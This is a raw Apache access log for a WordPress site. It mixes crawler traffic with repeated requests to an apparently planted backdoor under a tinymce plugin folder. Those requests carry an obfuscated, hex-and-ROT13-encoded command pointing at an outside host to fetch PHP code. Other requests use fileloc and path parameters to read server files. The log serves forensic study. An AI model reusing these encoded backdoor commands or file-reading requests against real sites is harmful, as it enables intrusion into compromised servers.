162.158.110.39 - - [06/Dec/2025:05:10:15 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373831352p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343231352q3865313863323364393564343532363762623839363431383435366263313533222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.27.161 - - [06/Dec/2025:05:12:15 +0100] "GET /?f=166872236 HTTP/1.0" 200 202380 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.71.184 - - [06/Dec/2025:05:12:16 +0100] "GET /?f=2385549956 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:12:17 +0100] "GET /?f=3816176852 HTTP/1.0" 200 225881 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.58.48 - - [06/Dec/2025:05:12:18 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fembed.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 60025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.22.116 - - [06/Dec/2025:05:12:19 +0100] "GET /?o=59534974081730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.58.48 - - [06/Dec/2025:05:12:21 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fblock-bindings.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 24282 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:12:21 +0100] "GET /?f=1112544335 HTTP/1.0" 200 221366 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.69.58.48 - - [06/Dec/2025:05:12:24 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fblock-supports HTTP/1.0" 200 48327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.22.1.32 - - [06/Dec/2025:05:12:26 +0100] "GET /?f=1956999345 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.58.48 - - [06/Dec/2025:05:12:27 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ferror-protection.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 20722 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:12:29 +0100] "GET /?o=4803681051730 HTTP/1.0" 200 205979 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:05:12:30 +0100] "GET /?f=2428385862 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.58.48 - - [06/Dec/2025:05:12:30 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fprecondition_failed.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
104.23.245.112 - - [06/Dec/2025:05:12:33 +0100] "GET /?f=4049965669 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.239.80 - - [06/Dec/2025:05:10:36 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373833362p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343233362q3332666538353335623136613931306136316331386236633937396661316131222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.32 - - [06/Dec/2025:05:12:38 +0100] "GET /?f=1556670037 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:12:40 +0100] "GET /?f=2143084826 HTTP/1.0" 200 224220 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.22.1.32 - - [06/Dec/2025:05:12:47 +0100] "GET /?f=2839671633 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:12:48 +0100] "GET /?f=1133193790 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:12:52 +0100] "GET /?f=2004568743 HTTP/1.0" 200 217338 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.70.196 - - [06/Dec/2025:05:12:54 +0100] "GET /?f=3608621249 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.22.1.32 - - [06/Dec/2025:05:12:56 +0100] "GET /?f=898139013 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.144.16 - - [06/Dec/2025:05:10:57 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373835372p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343235372q6532653735303064313037343833373731353262663635656363653531373934222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.68.70.196 - - [06/Dec/2025:05:12:58 +0100] "GET /?f=3445848187 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:13:00 +0100] "GET /?f=2393644016 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:13:03 +0100] "GET /?f=1784906097 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.175.148 - - [06/Dec/2025:05:13:03 +0100] "GET /?f=1384188572 HTTP/1.0" 200 217017 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.70.196 - - [06/Dec/2025:05:13:05 +0100] "GET /?f=1096659764 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:13:06 +0100] "GET /?o=92416998021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:13:11 +0100] "GET /?f=3080203088 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.245.112 - - [06/Dec/2025:05:13:14 +0100] "GET /?f=520595299 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:13:15 +0100] "GET /?f=1297571402 HTTP/1.0" 200 208289 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.245.112 - - [06/Dec/2025:05:13:16 +0100] "GET /?f=1164004119 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.240.208 - - [06/Dec/2025:05:11:18 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373837382p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343237382q3266303564373065633631363565383238336431363038313161306330613539222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.22.1.32 - - [06/Dec/2025:05:13:19 +0100] "GET /?f=1782149974 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:13:20 +0100] "GET /?f=2087405202 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:13:26 +0100] "GET /?f=2941083147 HTTP/1.0" 200 217840 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
108.162.238.44 - - [06/Dec/2025:05:13:27 +0100] "GET /?f=1625117228 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:13:29 +0100] "GET /?o=13589653041730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.241.164 - - [06/Dec/2025:05:13:33 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Ffeed-atom-comments.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 23206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.44 - - [06/Dec/2025:05:13:34 +0100] "GET /?f=437687777 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.241.164 - - [06/Dec/2025:05:13:35 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-walker-page.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 24890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:13:38 +0100] "GET /?f=2335255421 HTTP/1.0" 200 204577 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.23.239.80 - - [06/Dec/2025:05:11:39 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373839392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343239392q6263323031366264376661643139316234623730303165346561316635306635222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
108.162.241.164 - - [06/Dec/2025:05:13:38 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fupdate.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 59168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.241.164 - - [06/Dec/2025:05:13:41 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fsession.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16475 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
108.162.238.44 - - [06/Dec/2025:05:13:42 +0100] "GET /?o=96017092001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.241.164 - - [06/Dec/2025:05:13:44 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-snoopy.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 59354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:05:13:50 +0100] "GET /?o=30560001051730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:13:49 +0100] "GET /?f=2239878074 HTTP/1.0" 200 219822 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.164.92 - - [06/Dec/2025:05:12:00 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373932302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343332302q3538653831303735653063333866393063653739646261626666343133343637222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.70.126.202 - - [06/Dec/2025:05:14:01 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs%2Fnot_implemented.html&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Ferror_docs HTTP/1.0" 200 17390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.126.202 - - [06/Dec/2025:05:14:02 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcache.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 30164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.126.202 - - [06/Dec/2025:05:14:05 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-phpass.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 23519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.70.196 - - [06/Dec/2025:05:14:06 +0100] "GET /?f=2852377676 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.27.161 - - [06/Dec/2025:05:14:06 +0100] "GET /?f=3357400332 HTTP/1.0" 200 199708 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.126.202 - - [06/Dec/2025:05:14:08 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcompat-utf8.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 37039 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.126.202 - - [06/Dec/2025:05:14:11 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fcapabilities.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 64749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:05:14:12 +0100] "GET /?f=183005804 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:14:12 +0100] "GET /?f=3014198057 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
108.162.238.44 - - [06/Dec/2025:05:14:14 +0100] "GET /?f=34203028 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.52 - - [06/Dec/2025:05:14:16 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fabilities.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 26736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:14:17 +0100] "GET /?f=3544079862 HTTP/1.0" 200 233592 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.120.52 - - [06/Dec/2025:05:14:19 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Flocale.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 16358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.195.207 - - [06/Dec/2025:05:12:21 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373934312p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343334312q3835306439333738656463623131323764656134396436646239396162643132222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
104.23.245.112 - - [06/Dec/2025:05:14:22 +0100] "GET /?f=2172251320 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.120.52 - - [06/Dec/2025:05:14:22 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fglobal-styles-and-settings.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 39403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.71.120.52 - - [06/Dec/2025:05:14:25 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-theme.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 90251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:05:14:29 +0100] "GET /?path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-content%2Fwpvivid_uploads HTTP/1.0" 200 18141 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:14:29 +0100] "GET /?f=4225523613 HTTP/1.0" 200 206024 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.68.27.161 - - [06/Dec/2025:05:14:30 +0100] "GET /?f=1131313229 HTTP/1.0" 200 236209 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:05:14:31 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-walker-category-dropdown.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 18996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.70.80.30 - - [06/Dec/2025:05:14:34 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-recovery-mode-email-service.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 28515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.27.161 - - [06/Dec/2025:05:14:36 +0100] "GET /?f=3938402873 HTTP/1.0" 200 224300 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.80.30 - - [06/Dec/2025:05:14:37 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fblocks.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 140568 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.69.71.183 - - [06/Dec/2025:05:14:37 +0100] "GET /?f=1091993667 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.116 - - [06/Dec/2025:05:14:38 +0100] "GET /?f=1293127845 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.70.80.30 - - [06/Dec/2025:05:14:40 +0100] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes%2Fclass-IXR.php&path=%2Fvar%2Fwww%2Fvhosts%2Fiphonesused.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 18940 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
172.68.195.207 - - [06/Dec/2025:05:12:42 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939373936322p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343939343336322q3337383161373465343164313764313362353235646137663135336566353639222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
